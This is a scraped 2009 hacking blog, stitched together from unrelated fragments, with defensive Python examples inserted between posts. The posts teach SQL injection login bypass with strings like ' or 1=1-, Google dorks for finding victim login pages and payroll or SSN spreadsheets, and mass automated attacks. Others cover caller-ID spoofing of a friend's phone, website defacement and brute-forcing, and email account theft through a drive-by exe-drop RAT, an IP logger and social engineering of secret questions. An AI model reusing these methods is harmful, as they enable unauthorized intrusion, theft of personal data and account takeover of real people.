8. Evaluate the potential for system/hardware upgrades... usually, the best bang for the buck is adding memory so buy all that you can afford (don't go much above 512 megs for Win 98 or ME). If you have a motherboard with an 8x-capable AGP port but you are using an older 4x video card, update it.
List Of Sql Injection Strings..
One of the major problems with SQL is the poor security surrounding login and URL strings. This tutorial is not going to go into detail on why these strings work, as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems.
First SEARCH the following keywords in Google or any search engine:
admin\login.asp
login.asp
With these two search strings you will have plenty of targets to choose from... choose one that is vulnerable.
INJECTION STRINGS: How to use it?
This is the easiest part... very simple. On the login page just enter something like
user:admin (you don't even have to put this.)
pass:' or 1=1 -
or
user:' or 1=1-
admin:' or 1=1 -
Some sites will have just a password, so
password:' or 1=1-
In fact I have compiled a combo list with strings like this to use on my chosen targets. There are plenty of strings in the list below. There are many other strings involving, for instance, UNION table access via reading the error pages' table structure; thus an attack with this method will eventually reveal admin U\P paths. The ones I am interested in are quick access to targets.
PROGRAM
I tried several programs to use with these search strings, and up to now only Ares has performed well, with quite a bit of success with a combo list formatted this way. Yesterday I loaded 40 eastern targets with 18 positive hits in a few minutes; how long would it take to go through 40 sites cutting and pasting each string? Combo example:
admin:' or a=a-
admin:' or 1=1 -
And so on. You don't have to be admin and still can do anything you want. The most important part is
example:' or 1=1-
This is our basic injection string.
Now the only trudge part is finding targets to exploit. So I tend to search, say, Google for login.asp or whatever:
inurl:login.asp
index of:/admin/login.asp
Like this: index of login.asp
Result: http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets; trying various searches spews out plenty more.
Now, using a proxy set in my browser, I click through interesting targets, seeing what's what on the site pages. If interesting, I then cut and paste the URL as a possible target. After an hour or so you have a list of sites of potential targets like so:
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on. In a couple of hours you can build up quite a list, because I don't select all results or spider for login pages. I then save the list, fire up Ares and enter
1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start.
Now I don't want to go into problems with users using Ares... thing is, I know it works for me... Sit back and wait. Any vulnerable target will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is, you know you CAN access the site. Really I need a program that will return the hit with a click on the URL and ignore false outputs. I am still looking for it. This will save quite a bit of time going to each site and each string to find it's not exploitable. There you go, you should have access to your vulnerable target by now.
Another thing: you can use the strings in the URLs where user=? Edit the URL to the = part and paste ' or 1=1 - so it becomes user=' or 1=1-, just as quick as the login process.
Combo List
There are a lot of other variations of the injection string which I cannot put on my blog because that is illegal. If you are interested I can send them to you through email. Just write your email address in a comment and I will send it to you as early as possible, but you need to remain patient; it may take 1 or 2 days.
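The strings in this post only work against a login page that pastes user input directly into its SQL text. The following is an added example, not code from the original post or from any site it mentions: the same login check written the vulnerable way and then with a parameterized query and salted password hashes. The table layout, account names and passwords are constructed for the demonstration, and SQLite stands in for the database behind an ASP login page.

```python
import hashlib
import hmac
import os
import sqlite3

# Classic form of the string the post describes, used here as constructed test input.
INJECTION = "' or 1=1--"


def _hash(password, salt):
    """Salted PBKDF2 hash so the hardened path never stores or compares plaintext."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    """In-memory database with two constructed accounts.

    The plaintext 'password' column exists only so the legacy, vulnerable
    check has something to compare against.
    """
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users ("
        "username TEXT PRIMARY KEY, password TEXT, salt BLOB, pw_hash BLOB)"
    )
    for name, pw in (("admin", "constructed-admin-pw"),
                     ("alice", "constructed-alice-pw")):
        salt = os.urandom(16)
        db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
                   (name, pw, salt, _hash(pw, salt)))
    return db


def login_vulnerable(db, username, password):
    """BEFORE: input is concatenated into the SQL text.

    A quote in either field ends the string literal, and the rest of the
    input is parsed as SQL, so the WHERE clause can be made always true.
    """
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(db, username, password):
    """AFTER: the value is bound as a parameter and can never become SQL.

    The password is verified in application code against a salted hash
    using a constant-time comparison.
    """
    row = db.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        _hash(password, b"\x00" * 16)  # keep timing similar for unknown users
        return None
    salt, pw_hash = row
    if hmac.compare_digest(_hash(password, salt), pw_hash):
        return username
    return None


if __name__ == "__main__":
    db = make_db()
    for label, check in (("vulnerable", login_vulnerable),
                         ("hardened", login_hardened)):
        print(label, "password field:", check(db, "admin", INJECTION))
        print(label, "username field:", check(db, INJECTION, "x"))
```

The same parameter binding closes the user=... URL case mentioned at the end of the post, since the value reaches the database as data whichever way it arrived.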
Thursday, August 20, 2009
Hack Windows Vista Admin/Administrator Account password.
Please take note that this handy tip is intended to recover/regain a forgotten Vista Administrator password. It is not intended for illegally hacking into a Vista system that is not owned by the user referring to this guide!!
It is also intended to inform Vista users about the method by which anyone can access their private accounts by cracking passwords.... Thus anyone can hack into the administrator account and bypass guest user restrictions....
Let's start...
Steps to hack Windows Vista Administrator account password:
1. Reboot the Windows Vista and boot up with Windows Vista installation DVD.
Crack Windows Vista logon account password in a minute with the Windows Vista installation DVD. Click on the Repair Your Computer option, bring up Command Prompt to open Local Users and Groups management in MMC.
2. When the Windows Vista installation interface pops up, click the Repair Your Computer link at the bottom-left corner.
3. Next, the System Recovery Options dialog box appears. There are a few options related to repairing Windows Vista, much like the Recovery Console in Windows XP:
Startup Repair is used to automatically fix problems that are preventing Windows Vista from starting.
System Restore to restore Windows Vista setting to an earlier point in time.
Windows Complete PC Restore to restore Windows Vista from a full system backup.
Windows Memory Diagnostic Tool could be the first Microsoft memory tester toolkit that is bundled with Windows setup media.
Command Prompt is the target option of this Vista hacking guide. Click on this option now.
4. In the Windows Vista Command Prompt, type mmc.exe and press ENTER key to bring up the Microsoft Management Console.
5. Click on the File menu, select Add / Remove Snap-in option, locate and select the Local Users and Groups on the left panel, and click Add button to add it to the right panel.
6. Now, the Choose Target Machine dialog box pops up. Keep the default setting by clicking the Finish button - that means using the Local Users and Groups snap-in to manage this local computer, and not another computer in the network.
7. Click the OK button and return to the MMC window. Under the Root Console in the left panel, double-click Local Users and Groups that was added earlier. Click on the Users folder, then locate and right-click the target Vista logon account found in the right panel.
Select the Set Password from the right-click menu to set a new password / reset old password.
Note this does not work on all versions of Vista. But, it can be used to hack administrator account password of Windows Vista...
Further Read:
Hacking Password Protected Laptops
Vista tips, tricks and tweaks
Activate Administrative shares on Vista
Tuesday, August 18, 2009
What to Do when Ur Orkut is Hacked!
It can be a nightmare if someone else takes control of your Google Account because all your Google services like Gmail, Orkut, Google Calendar, Blogger, AdSense, Google Docs and even Google Checkout are tied to the same account.
Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:
1. Reset Your Google Account Password:
Type the email address associated with your Google Account or your Gmail user name at google.com/accounts/ForgotPasswd - you will receive an email at your secondary email address with a link to reset your Google Account password.
This will not work if the other person has changed your secondary email address or if you no longer have access to that address.
2. For Google Accounts Associated with Gmail:
If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.
3. For Hijacked Google Accounts Not Linked to Gmail:
If your Google Account doesn't use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original "Google Email Verification" message.
It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.
Monday, August 17, 2009
Hack torrent to get the most of it... A little info ...
This tutorial will help you hack torrent to increase your torrent download speed while using torrent software like BitTorrent, Azureus, BitComet... Thus, you will be able to download torrent movies, music, videos and warez all at high speed.
It also explains all torrent concepts... just get the most out of torrent...
What is a torrent?
A torrent file is used by a torrent client to download various files like movies, music, warez, etc. Just think of it as a set of instructions that tell the torrent client what to download. Torrent files are usually only a few kB big, but can be used to download much bigger files.
The Anatomy of a torrent
When browsing torrent sites, you'll notice a lot of information regarding a torrent. Here are the 3 main terms associated with a torrent file:
Leech: A peer - or any client that does not have 100% of the data.
Seeder: A seeder is a peer that has a complete copy of the torrent and still offers it for upload. The more seeders there are, the better the chances are for completion of the file.
Peer: A peer is one instance of a BitTorrent client running on a computer on the Internet that other clients connect to and transfer data.
Torrent Clients
A torrent client is basically a program that you open a torrent in, allowing a particular file to be downloaded to your computer. There are many free torrent clients on the internet. These include BitComet, Azureus and uTorrent. Many torrent sites, however, have banned clients such as BitComet, as it gives a better download speed than upload speed, meaning that people don't share their data, which is what torrents are all about. Personally, I recommend uTorrent. It's fast, simple and easy to use.
Downloading
***For any examples given, please note I will be referring to uTorrent on Windows***
***It should also be noted that torrents take a while to get started properly. I recommend you wait at least half an hour before really investigating the issue of poor download speeds***
Okay, so let me begin. You've just come across a torrent you really want. So, naturally enough you open it in a torrent client. So you're sitting there with a torrent. Downloading. One thing though, the download rate is shit, right? This is common among torrent users, so don't blame your computer. There are a number of reasons for the poor download rates, some of which I will discuss below.
Routers
Ah routers. These are one of the main limiting factors of a torrent's download rate. Basically your router has to have specific ports open on it to allow connections from other peers.
This is called port forwarding. I won't go into detail here, as there's enough information for its own article, but I will tell you to go to www.portforward.com. It contains specific configurations for almost every router and program combination under the sun (Sorry). Just follow the instructions, and you should be downloading with great speeds in no time. If not, just read on below!
Firewalls
Okay, in uTorrent go to Options>Preferences>Connection. You should see "Port used for incoming connections" and a box beside it. In the box there should be a number. Take note of it; it's the port number that uTorrent is listening on for connections. Okay, now go into the Control Panel on Windows, and double-click the "Windows Firewall" icon. Click the "Exceptions" tab and click "Add Port". For name type "TorrentTCP", for port type the port number you took note of earlier, and click TCP, then hit "OK". Repeat the process, except this time for name type "TorrentUDP", for port enter the same as before, and click UDP, then hit "OK". Okay, go check the download speeds on your torrent. If it's not improved then read on, my friends.
Torrent Client Hacking
Okay guys, my saving grace. A lot of this section is taken from www.torrentfreak.com so big up to those guys.
1. Hack the max half-open TCP connections
If you're on XP SP2, your half-open TCP connections are limited to a maximum of 10. This might hurt your download speed because it won't let you connect to as many peers as you want. It is supposed to slow down viruses, because their spreading strategy is to connect to a large number of IP addresses, but it could cripple your torrent downloads. A nice way to fix this is to download this patch: http://lvllord.de/?lang=en&url=downloads also http://torrentfreak.com/evid4 226 patch223d-enzip/
Note: Some people report that their antivirus reports the patch to be a virus. This is not the case.
Check out www.lvllord.de for more details on this.
The patch allows you to set the maximum allowed connections to any number you want. Any number between 50 and 100 is ok (more is NOT always better).
Next you need to configure your torrent client to allow 50-100 max half-open TCP connections.
In uTorrent, go to: Options>Preferences>Advanced options>net.max_halfopen and change its value to 80,
then hit "Set" and "OK".
2. Maximum upload speed
Probably the most important setting there is. Your connection is (sort of) like a pipeline: if you use your maximum upload speed there's not enough space left for the files you are downloading. So you have to cap your upload speed.
Use the following formula to determine your optimal upload speed:
80% of your maximum upload speed
So if your maximum upload speed is 40 kB/s, the optimal upload rate is 32 kB/s.
But keep seeding!
Sunday, August 16, 2009
Make anonymous phone calls
This is basically a novice trick that doesn't get into the principles of VoIP and telecom. It demonstrates the security lapses of a VoIP telephone service provider named TABRIO. This is the kind of small hack that uses a service to have fun with friends' phones. First of all I will tell my story of how I fooled my friends with this stuff. Last night while speaking to my friend I lost the call as my prepaid airtime ran out. Desperate to speak, I looked for options. I sat for a moment and got immediately to my PC. I just googled for a way to call free and I found one. During the process I got my hands on this free service called TABRIO. Now I could call her. (Tabrio provides $5 airtime free.) No big deal, a lot of VoIP-based internet calling services give free talk time; what's great about Tabrio is the caller ID spoofing thing you can play with.
What is Call Spoofing :-
Call spoofing is a small hack on the telephone network that makes the recipient's phone display a number that is not, in reality, the number the call is coming from.
What all you have to do to make a free call :-
a) You should own one email address.
b) You should have one personal mobile connection.
c) Make a free account in 2 minutes. ( www.tabrio.com )
d) Get up to 30 mins to call all around the world on any phone services.
e) Go with the steps given there.
f) Make a call.
g) Enjoy and share your experience with us.
How to make call spoofing on friends Phone number :-
a) You should own one email address different from the above email address.
b) Just take your friend's phone for 3 minutes.
c) Just make the account in www.tabrio.com
d) Confirm the phone number and enter the 4 digit number, which is shown on the PC screen. (Be fast, your friend can come any time.)
e) Now you can spoof any call to your friend's phone number. You can even call from a number like 123456786 or 0000000000.
f) Get up to 30 minutes to call all around the world on any phone services.
The intent of this post is for recreational purpose. Do not use the above methods to do anything that could land you in trouble.
After trying, share your experiences/problems with me... RoneY
Friday, August 14, 2009
Hack orkut passwords
Orkut is a highly successful social networking site in Brazil, India, and Pakistan. In these countries Orkut is much more famous than any of the other social networking sites such as Facebook and Myspace. The Orkut demographics show the penetration of this social networking tool, with above 51% from Brazil ( http://www.orkut.co.in/Main#MembersAll.aspx ). Developed by Orkut Büyükkökten and later bought by Google, this social networking tool is growing far faster than any other. With its popularity grows the demand for hacking into someone's Orkut account. We are getting so many comments on several pages of this website on how to break into an Orkut account, how to break an Orkut password, etc. As always, our humble reply: we don't endorse hacking. We will not help anyone break into an Orkut account, nor provide any help if they have forgotten their passwords.
One thing people forget is that Orkut, just like any other web-based service, stores the password in encrypted format, and it is just not possible to figure out the password even with the help of the employees who work there. How is it possible? Without going into technical details, let us explain things in a simple way. When you register for a web-based service you provide the password; one thing most trusted websites do is encrypt the password provided by you. The encryption is not reversible, i.e. no one can decode the string back to the original format (strictly speaking, this is one-way hashing rather than encryption). Suppose you have the password "MyPassword". This password is stored on the Orkut (or any other) server in encrypted format, something like: MyPassword => khkjhd877 e8 q78 e8634 but3874 @63. There are several techniques available, like MD5, SHA etc. These algorithms are not reversible, i.e. you can convert MyPassword to khkjhd877 e8 q78 e8634 but3874 @63 but khkjhd877 e8 q78 e8634 but3874 @63 can't be converted back to MyPassword.
Whenever you enter the user name and password, the website converts your password with MD5 or SHA or whatever it is, and cross-checks the result against the stored value. So not even a Google employee can retrieve your password. Well, it can be reset. Orkut passwords could be compromised only if you are:
- Using a computer with a keylogger installed
- Using a computer affected with some Trojan or virus
- Using other websites where you have used the same password and which is not encrypted
So next time, before thinking about hijacking a friend's Orkut account, remember it's not that easy.
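The store-and-cross-check flow described above, as an added example that is not part of the original post and is not Orkut's or Google's actual implementation. It puts the bare MD5 the post names beside a salted, iterated hash (PBKDF2-HMAC-SHA256, swapped in here); the function names, the iteration count and the sample accounts are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
from collections import defaultdict

PBKDF2_ITERATIONS = 200_000  # assumed work factor, chosen for the illustration


def md5_unsalted(password):
    """Bare MD5 as named in the post: not reversible, but fast and deterministic."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def register(password):
    """Build the record a site stores instead of the password itself."""
    salt = os.urandom(16)  # fresh random salt for every account
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, PBKDF2_ITERATIONS)
    return {"salt": salt.hex(), "iterations": PBKDF2_ITERATIONS, "hash": digest.hex()}


def verify(password, record):
    """The cross-check at login: re-derive from the submitted password and
    compare with the stored value in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(record["salt"]),
                                    record["iterations"])
    return hmac.compare_digest(candidate, bytes.fromhex(record["hash"]))


def accounts_sharing_a_digest(stored):
    """Given {account: stored digest}, list groups of accounts whose digests match."""
    groups = defaultdict(list)
    for account, digest in stored.items():
        groups[digest].append(account)
    return sorted(sorted(g) for g in groups.values() if len(g) > 1)


# Constructed sample accounts; two of them chose the same password.
SAMPLE_PASSWORDS = {"alice": "MyPassword", "bob": "tr0ub4dor", "carol": "MyPassword"}


def compare_storage_schemes(passwords=SAMPLE_PASSWORDS):
    """Store the same passwords both ways and report what each table reveals."""
    unsalted = {user: md5_unsalted(pw) for user, pw in passwords.items()}
    salted = {user: register(pw) for user, pw in passwords.items()}
    return {
        "unsalted_md5_shared": accounts_sharing_a_digest(unsalted),
        "salted_pbkdf2_shared": accounts_sharing_a_digest(
            {user: rec["hash"] for user, rec in salted.items()}),
        "alice_login_ok": verify("MyPassword", salted["alice"]),
        "alice_wrong_password": verify("mypassword", salted["alice"]),
    }


if __name__ == "__main__":
    for key, value in compare_storage_schemes().items():
        print(key, value)
```

With the bare digest, the stored table alone shows which accounts share a password and one precomputed list can be matched against every account at once; the per-account salt and the iteration count remove both shortcuts.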
Friday, July 31, 2009
Google search hacking
Well, if you ask me, this is the best part: "how to search". Anyone, anywhere needs something out of the great "www". If you know how to grab hold of that "something" in one click, that is the skill. This article is one of my best, and is specially crafted to meet all your needs!!
Google Operators:
Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers' weapons.
Basic Operators:
+, -, ~, ., *, "", |, OR
Advanced Operators:
allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange:
Basic Operators !!
(+) force inclusion of something common
Google ignores common words (where, how, digit, single letters) by default:
Example: Star Wars Episode +I
(-) exclude a search term
Example: apple -red
(") use quotes around a search term to search exact phrases:
Example: "Robert Masse"
Robert masse without "" has 309,000 results, but "robert masse" only has 927 results. The quotes remove the 99% of results that are irrelevant.
(~) search synonym:
Example: ~food
Returns results about food as well as recipe, nutrition and cooking information
(.) a single-character wildcard:
Example: m.trix
Returns results for M@trix, matrix, metrix...
(*) any word wildcard
Advanced Operators: "Site:"
site:domain_name
Find Web pages only on the specified domain. If we search a specific site, we usually get the Web structure of the domain.
Examples:
site:shaswat.bravehost.com
Advanced Operators: "Filetype:"
filetype:extension_type
Find documents with specified extensions
The supported extensions are:
- HyperText Markup Language (html)
- Adobe Portable Document Format (pdf)
- Adobe PostScript (ps)
- Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
- Lotus WordPro (lwp)
- MacWrite (mw)
- Text (ans, txt)
- Microsoft PowerPoint (ppt)
- Microsoft Word (doc)
- Microsoft Works (wks, wps, wdb)
- Microsoft Excel (xls)
- Microsoft Write (wri)
- Rich Text Format (rtf)
- Shockwave Flash (swf)
Note: We can actually search asp, php, cgi and pl files too, as long as they are text-compatible.
Example: Budget filetype:xls
Advanced Operators: "Intitle:"
intitle:search_term
Find search term within the title of a Webpage
allintitle:search_term1 search_term2 search_term3
Find multiple search terms in the Web pages with the title that includes all these words
These operators are specifically useful to find the directory lists
Example:
Find directory list:
intitle:index.of "parent directory"
Advanced Operators: "Inurl:"
inurl:search_term
Find search term in a Web address
allinurl:search_term1 search_term2 search_term3
Find multiple search terms in a Web address
Examples:
inurl:cgi-bin
allinurl:cgi-bin password
Advanced Operators: "Intext:"
intext:search_term
Find search term in the text body of a document.
allintext:search_term1 search_term2 search_term3
Find multiple search terms in the text body of a document.
Examples:
intext:Administrator login
allintext:Administrator login
Advanced Operators: "Cache:"
cache:URL
Find the old version of a Website in the Google cache
Sometimes, even after the site has been updated, the old information can still be found in the cache
Examples:
cache:http://shaswat.bravehost.com
Advanced Operators: ".."
Conduct a number range search by specifying two numbers, separated by two periods, with no spaces. Be sure to specify a unit of measure or some other indicator of what the number range represents
Examples:
Computer $500..1000
DVD player $250..350
Advanced Operators: "Daterange:"
daterange:start_date-end_date
Find the Web pages between start date and end date
Note: start_date and end_date use the Julian date
The Julian date is calculated by the number of days since January 1, 4713 BC. For example, the Julian date for August 1, 2001 is 2452122
Examples:
2004.07.10 = 2453196
2004.08.10 = 2453258
Vulnerabilities date range: 2453196-2453258
Advanced Operators: "Link:"
link:URL
Find the Web pages having a link to the specified URL
related:URL
Find the Web pages that are "similar" to the specified Web page
info:URL
Present some information that Google has about that Web page
define:search_term
Provide a definition of the words gathered from various online sources
Examples:
link:shaswat.bravehost.com
related:shaswat.bravehost.com
info:shaswat.bravehost.com
define:Network security
Advanced Operators: "Phonebook:"
phonebook:
Search the entire Google phonebook
rphonebook:
Search residential listings only
bphonebook:
Search business listings only
Examples:
phonebook:robert las vegas (robert in Las Vegas)
phonebook:(702) 944-2001 (reverse search, does not always work)
The phonebook is limited to the U.S.A.
But the question arises: what can Google do for an ethical hacker?
- Search sensitive information like payroll, SIN, even the personal email box
- Vulnerabilities scanner
- Transparent proxy
So how about if I tell you a different way to search?
OK, let's do this: type in the following statements and see the results.
We can only provide you the guidelines; now you need to apply your creativity to keep it rolling.
http://shaswat.bravehost.com
Salary
Salary filetype:xls site:edu
Security social insurance number
intitle:Payroll intext:ssn filetype:xls site:edu
Security Social Insurance Number
Payroll
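To see what the operators above would surface on a site you run, the following added example (not part of the original article) implements the matching rules for site:, filetype:, intitle:, inurl:, intext:, quoted phrases, the "." wildcard and "-" exclusion, and runs the article's own example queries over an inventory of your pages. The inventory records, the example.edu host and all function names are constructed for the illustration, and the matching is a simplification of what Google actually does.

```python
import re
from urllib.parse import urlparse

# Constructed inventory of publicly served pages: URL, <title> and a text excerpt.
SAMPLE_PAGES = [
    {"url": "http://www.example.edu/files/",
     "title": "Index of /files",
     "text": "Name Last modified Size Parent Directory budget.xls payroll_2009.xls"},
    {"url": "http://www.example.edu/files/payroll_2009.xls",
     "title": "Payroll 2009",
     "text": "Employee SSN Salary Department"},
    {"url": "http://www.example.edu/cgi-bin/search.pl",
     "title": "Site search",
     "text": "Enter a search term"},
    {"url": "http://www.example.edu/about.html",
     "title": "About the department",
     "text": "Faculty, staff and salary scale policy"},
]

# Queries taken from the article's examples (operator and term written without a space).
ARTICLE_QUERIES = [
    'intitle:index.of "parent directory"',
    'inurl:cgi-bin',
    'Salary filetype:xls site:edu',
    'intitle:Payroll intext:ssn filetype:xls site:edu',
]

TOKEN = re.compile(
    r'(-?)(?:(site|filetype|intitle|inurl|intext):)?(?:"([^"]*)"|(\S+))', re.I)


def parse_query(query):
    """Split a query into (negated, operator, term) clauses; bare words get 'any'."""
    clauses = []
    for neg, op, phrase, word in TOKEN.findall(query):
        clauses.append((bool(neg), (op or "any").lower(), (phrase or word).lower()))
    return clauses


def term_regex(term):
    """Literal match, except '.' which stands for any single character."""
    return re.compile("".join("." if ch == "." else re.escape(ch) for ch in term), re.I)


def clause_matches(op, term, page):
    url = urlparse(page["url"])
    host = (url.hostname or "").lower()
    if op == "site":        # exact host or any sub-domain of the given suffix
        return host == term or host.endswith("." + term)
    if op == "filetype":    # extension of the URL path
        return url.path.lower().endswith("." + term)
    fields = {"intitle": [page["title"]],
              "inurl": [page["url"]],
              "intext": [page["text"]],
              "any": [page["title"], page["text"], page["url"]]}[op]
    rx = term_regex(term)
    return any(rx.search(field) for field in fields)


def run_query(query, pages):
    """Return the URLs that satisfy every clause (and none of the '-' clauses)."""
    clauses = parse_query(query)
    return [p["url"] for p in pages
            if all(clause_matches(op, term, p) != neg for neg, op, term in clauses)]


def audit(pages, queries=ARTICLE_QUERIES):
    """Map each query to the pages of the inventory it would expose."""
    return {q: hits for q in queries if (hits := run_query(q, pages))}


if __name__ == "__main__":
    for query, hits in audit(SAMPLE_PAGES).items():
        print(f"{query}\n    -> {', '.join(hits)}")
```

Every hit is a page to fix at the source: turn off directory listing, move the spreadsheet behind authentication, or take the script out of the public tree. An empty result from `audit()` means none of the listed queries matches the inventory.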
Monday, July 27, 2009
How to hack a website
Hacking a website or its member section
First of all,why you want to hack a webpage?Is it a certain webpage or any site at all? There are many reasons to hack a website, or a webmaster.Maybe you want to take a revenge or maybe you want to have fun or just learn how to do it ! You can deface the website which means replace the original index with a new one or you can gain access to the member area of the site which might be easier.
Defacing
You can deface the site through telnet or your browser by running remote commands on an old or misconfigured server. The hard thing to do is find an old server; maybe a network of a school or university would do. Get a CGI bug searcher. This program will scan ranges of IPs for web servers and will scan them for known bugs in their CGIs or other bugs and holes. You can learn how to exploit a certain hole by adding in Yahoo the name of the bug/hole and the word exploit; search for "cmd.exe exploit". There are more than 700 holes that many servers might have! You can also deface a website by finding the FTP password and just browsing through the site's FTP and replacing the index.htm. You do that with brute force.
To do that you need a brute forcer (brute force attacker) and some word lists. The brute forcer sends multiple user/pass requests using words that it picks up from name lists and tries to hack the account until it does! So let's say, imagine a porn site that asks for a password: you go there, you copy their address, you add the address in a program called a brute forcer, and then from the brute forcer you choose a text file with names to be used as usernames and a text file with names to be used as passwords. The brute forcer will try until it finds a correct user/pass.
This should be easier for the newbies than exploiting CGI bugs; many of the newbies haven't even heard of it. I hope I didn't confuse you with this tutorial. There might be more tuts about web hacking and CGI bugs and such. Till then, try to find the way to CGI bugs yourself with the CGI scanners in the Web Hacks section or download a brute forcer to crack accounts.
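The many user/pass requests described above leave a distinct trail in authentication logs. The following added example, not code from the original post, shows a sliding-window detector for that trail; the log format, the 60-second window and the threshold of 5 are assumptions, and the log lines are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed policy: look-back window per source
THRESHOLD = 5                   # assumed policy: failures tolerated in WINDOW

# Constructed sample log (hypothetical format: timestamp result user ip).
SAMPLE_LOG = """\
2009-07-27T10:00:00 FAIL user=alice ip=198.51.100.7
2009-07-27T10:00:02 FAIL user=admin ip=203.0.113.9
2009-07-27T10:00:03 FAIL user=admin ip=203.0.113.9
2009-07-27T10:00:04 FAIL user=admin ip=203.0.113.9
2009-07-27T10:00:05 FAIL user=admin ip=203.0.113.9
2009-07-27T10:00:06 FAIL user=admin ip=203.0.113.9
2009-07-27T10:00:09 OK user=admin ip=203.0.113.9
2009-07-27T10:00:20 OK user=alice ip=198.51.100.7
"""

def detect_bruteforce(lines, window=WINDOW, threshold=THRESHOLD):
    """Return alerts as (kind, ip, user) tuples in log order."""
    recent = defaultdict(deque)  # ip -> timestamps of failures inside window
    flagged = set()              # sources already reported as brute forcing
    alerts = []
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of failing the whole run
        ts = datetime.fromisoformat(parts[0])
        result = parts[1]
        user = parts[2].partition("=")[2]
        ip = parts[3].partition("=")[2]
        q = recent[ip]
        while q and ts - q[0] > window:
            q.popleft()  # drop failures that fell out of the window
        if result == "FAIL":
            q.append(ts)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, user))
        elif result == "OK" and len(q) >= threshold:
            # A login right after a burst of failures is the high-priority
            # case: the guessing may have succeeded.
            alerts.append(("success-after-bruteforce", ip, user))
    return alerts

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

A per-source window misses guessing that is slow or spread across many addresses, so pair it with per-account lockout or rate limiting.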
Sunday, July 26, 2009
How to Break Into Email Accounts Part 3
he/she logs on to his/her account.
Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.
Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an HTML document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too suspicious, and then embed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...
While you are at it, you will also want to set up an IP logger on the web page so that you can grab the IP address of the user so that you can connect to the newly established server. Here is the source for a PHP IP logger you can use on your page...
http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8
Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password.
However, what do you do if you cannot contact this user in any way to do any of the above tricks? Well, then you definitely have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.
If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/zip code questions with ease, and with a little mental backtracking, or social engineering (talking) the information out of the user, be able to get past the secret question. However, what do you do if you do not have this luxury? Well, in this case you will have to do a little detective work to fish out the information you need.
First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).
Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have?...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...